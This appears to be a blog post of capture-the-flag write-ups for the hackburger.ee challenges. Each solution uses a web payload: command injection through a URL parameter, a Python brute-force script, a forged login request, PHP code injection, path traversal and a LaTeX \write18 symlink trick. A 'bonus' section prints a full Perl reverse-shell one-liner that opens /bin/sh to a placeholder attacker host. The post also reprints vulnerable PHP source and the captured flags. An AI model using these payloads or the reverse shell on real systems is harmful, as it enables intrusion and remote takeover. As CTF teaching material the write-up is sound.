CTF,

hackburger.ee [all writeups]

sshot-1

I’ve decided to publish http://hackburger.ee writeups


== Warm up
http://burger.laboratorium.ee:8000/?host=%7Ccat+flag.php
Congratulations!
The flag is f1b35744925a3f5946c542a1ee64267af8b93b06
== File search (30 points)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from itertools import product
import requests
url = 'http://burger.laboratorium.ee:8004/'
x = map(''.join, product('0123456789abcdef', repeat=2))
flag = 'c8'
for i in range(0, 39):
for hexa in x:
payload = {'query': flag + str(hexa)}
r = requests.post(url, data=payload)
if 'flag.txt' in r.text:
flag += hexa
payload = {'query': str(flag)}
print flag
c82584c307421228a3c5c5e4dc6a3ea31859975e
== Enter password to get candy (30 points)
POST / HTTP/1.1
Host: burger.laboratorium.ee:8003
Content-Length: 32
Accept: */*
Origin: http://burger.laboratorium.ee:8003
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://burger.laboratorium.ee:8003/
Accept-Language: es-ES,es;q=0.8
Cookie: __tawkuuid=e::laboratorium.ee::TOmz6i1BEaKMU8mYuXzP+B0SfD+IhVbLHWkL958QseQJtBq2tG0WZnRmaOHHLny6::2; _ga=GA1.2.1703078470.1500476197
Connection: close
data=%7B%22password%22%3Atrue%7D
Logged in. Flag is: eae482e1c2d9147891174ecd38bb95a7ee2a9a70
== Number to ASCII converter (50 points)
http://1.hackme.laboratorium.ee/?number=var_dump(file_get_contents(%22where/is/the/flag/i/am/looking/for/flag.php%22));
== Magic (120 points)
Please enter 4 flags, separated by underscore (_).
Initially Flag3 was removed (replace with '0') but searching i have found it.
http://6.hackme.laboratorium.ee/03ada8e9692d58a7ff23d3e9317140f8582630d7.txt
Congratulations!
Flag 3 of 4 is: be2933a15bedf986b6e72e6addd3e439693b91fc
Please enter 4 flags, separated by underscore (_).
Flag1 of 4 is: 47b9664515420d44d2c77dc593f7514ccbd17be8
— on .git
47b9664515420d44d2c77dc593f7514ccbd17be8
— on robots.txt
Flag 2 of 4 is: 392d28473a135c2491c227f373d0eed0310e13e3
— on index.php~
Flag 4 of 4 is: ebb696a5abb04c8875a0afa29f6dc8d167db67e8
47b9664515420d44d2c77dc593f7514ccbd17be8_392d28473a135c2491c227f373d0eed0310e13e3_0_ebb696a5abb04c8875a0afa29f6dc8d167db67e8
== Underfull hbox (200 points)
Solution was a symlink that www-data moves to output.
www-data -> nginx
hackme8 -> php script
hackme8-jail -> sandboxed
\documentclass{article}
\begin{document}
\immediate\write18{ln -s /home/hackme8/task/index.php sometask.pdf}
txt
\end{document}
curl -vvv http://burger.laboratorium.ee:8008/output/4ceb1e89ab6841dc731bb3abf402c1245999b9634936b39eafb4532dc43f295e0cbacfdddc9d0fcb/sometask.pdf
* Trying 217.182.73.250…
* Connected to burger.laboratorium.ee (217.182.73.250) port 8008 (#0)
> GET /output/4ceb1e89ab6841dc731bb3abf402c1245999b9634936b39eafb4532dc43f295e0cbacfdddc9d0fcb/sometask.pdf HTTP/1.1
> Host: burger.laboratorium.ee:8008
> User-Agent: curl/7.47.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: nginx/1.10.3
< Date: Sat, 19 Aug 2017 07:10:13 GMT
< Content-Type: application/pdf
< Content-Length: 1405
< Last-Modified: Tue, 25 Jul 2017 13:04:20 GMT
< Connection: keep-alive
< ETag: "597741d4-57d"
< Accept-Ranges: bytes
<
<html>
<head>
<style>
textarea {
width: 100%;
height: 400px;
}
</style>
</head>
<body>
<h1>LaTeX compiler</h1>
<p>
happy underfull hboxes (badness 10000)
</p>
<h2></h2>
<form action="" method="POST">
<textarea name="content"></textarea>
<input type="submit" value="Compile LaTeX" />
</form>
<?php
// You may be interested in the flag.
// The flag is: e1b19a9f1159560c0036d87c4831f9cb26ef7d0c
if ($_POST['content']) {
echo '<h2>Compilation result</h2>';
function random_token() {
return bin2hex(openssl_random_pseudo_bytes(40));
}
$folder = random_token();
mkdir("/tmp/" . $folder);
system("chmod -R 777 /tmp/" . $folder);
$f = fopen("/tmp/" . $folder . "/doc.latex", "w");
fwrite($f, $_POST['content']);
fclose($f);
system('sudo -u hackme8-jail /home/hackme8-jail/task/compile-latex /tmp/' . $folder);
system("cp -R /tmp/" . $folder ." " . __DIR__ . '/output/');
echo "<a href='/output/" . $folder . "/doc.pdf'>here's your pdf</a>";
}
?>
</body>
</html>
Bonus – shell and OLD solution
\documentclass{article}
\begin{document}
\immediate\write18{perl -e 'use Socket;$i="YOUR";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'}
TXT
\end{document}
<html>
<head>
<style>
textarea {
width: 100%;
height: 400px;
}
</style>
</head>
<body>
<h1>LaTeX compiler</h1>
<p>
happy underfull hboxes (badness 10000)
</p>
<h2></h2>
<form action="" method="POST">
<textarea name="content"></textarea>
<input type="submit" value="Compile LaTeX" />
</form>
<?php
// You may be interested in the flag.
// The flag is: ea39877adf2aabe27c21f03c08caabc27851e18b
if ($_POST['content']) {
echo '<h2>Compilation result</h2>';
function random_token() {
return bin2hex(openssl_random_pseudo_bytes(40));
}
$folder = random_token();
mkdir("/tmp/" . $folder);
system("chmod -R 777 /tmp/" . $folder);
$f = fopen("/tmp/" . $folder . "/doc.latex", "w");
fwrite($f, $_POST['content']);
fclose($f);
system('sudo -u hackme8-jail /home/hackme/hackme8-jail/compile-latex /tmp/' . $folder);
system("cp -R /tmp/" . $folder ." output/");
echo "<a href='/output/" . $folder . "/doc.pdf'>here's your pdf</a>";
}
?>
</body>
</html>
== Zip file browser (150 points)
../../../../home/hackme/hackme5/index.php
<?php
$FLAG = '05f5ba70a5bcc14ba4dd2d66147045b3c067400c';
error_reporting(E_ALL);
ini_set("display_errors", 1);
function rand_key() {
$result = '';
for($i = 0; $i < 40; $i++) {
$result .= rand() % 10;
}
return $result;
}
if (!empty($_FILES)) {
$zip = $_FILES["zipfile"]["tmp_name"];
$name = $_POST['filename'];
$tempdir = sys_get_temp_dir() . '/dir_hackme5_' . rand_key();
mkdir($tempdir);
system("unzip -j ". escapeshellarg($zip) . " -d " . escapeshellarg($tempdir) . " 2>&1 > /dev/null");
echo '<h2>File contents</h2>';
if (stripos('/', $name) !== FALSE) {
die("hax0r no!");
}
echo file_get_contents($tempdir . "/" . $name);
}
?>
flag: 05f5ba70a5bcc14ba4dd2d66147045b3c067400c
== We tried to clone pastebin (90 points)
<?php
if (isset($_POST['content'])) {
if (strlen($_POST['content']) > 1000) {
die("At most 1000 chars");
}
$hash = md5(time() . time() . "6548b41279a6a0ecf4d210fdd078a19b63ed08e0" . sha1(time()));
$f = fopen(__DIR__ . "/files/" . $hash, 'w');
fwrite($f, date("Y-m-d H:i:s") . "\n");
fwrite($f, $_POST['content']);
fclose($f);
header("Location: /files/" . $hash);
die();
}
?>
<html>
<head>
<style>
textarea {
width: 100%;
height: 400px;
}
</style>
</head>
<body>
<h1>A service like pastebin, but worse</h1>
<h2>Add paste</h2>
<form action="" method="POST">
<textarea name="content"></textarea>
<input type="submit" value="Add" />
</form>
<h2>Recent pastes</h2>
<pre><?php
$files = scandir(__DIR__ . '/files/');
$lines = array();
foreach($files as $hash) {
if ($hash == '.' || $hash == '..') {
continue;
}
$f = fopen(__DIR__ . "/files/" . $hash, 'r');
$date_line = fgets($f);
fclose($f);
array_push($lines, $date_line);
}
sort($lines);
foreach($lines as $date_line) {
echo $date_line . "\n";
}
?></pre>
</body>
</html>
Take $hash = md5(time() . time() . "6548b41279a6a0ecf4d210fdd078a19b63ed08e0" . sha1(time()));
2017-07-23 19:15:11
The flag is: c4c1006fbdacbb8fd9cebee71a316bc2fac8620f
http://burger.laboratorium.ee:8007/files/e452096701642327b38f352430b89e97
<?php $i='1500830111';
echo md5($i . $i . "6548b41279a6a0ecf4d210fdd078a19b63ed08e0" . sha1($i));
?>

No hay contenido relacionado



1 comentario

tunelko

noviembre 30, 2017

Hi 123,

I have solved this task when it was buggy and can be solved from other tasks. Site had been with some tasks problems and i haven’t retry to solve it. i guess by the code you can upload a crafted file to reach rce due to system command. Maybe, but i have not try it.

123

noviembre 5, 2017

Thanks to release the write-up. Can you explain more about Zip file browser task? I don’t understand that exploit code can be bypassed to «stripos» for LFI..

Leave a Reply

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.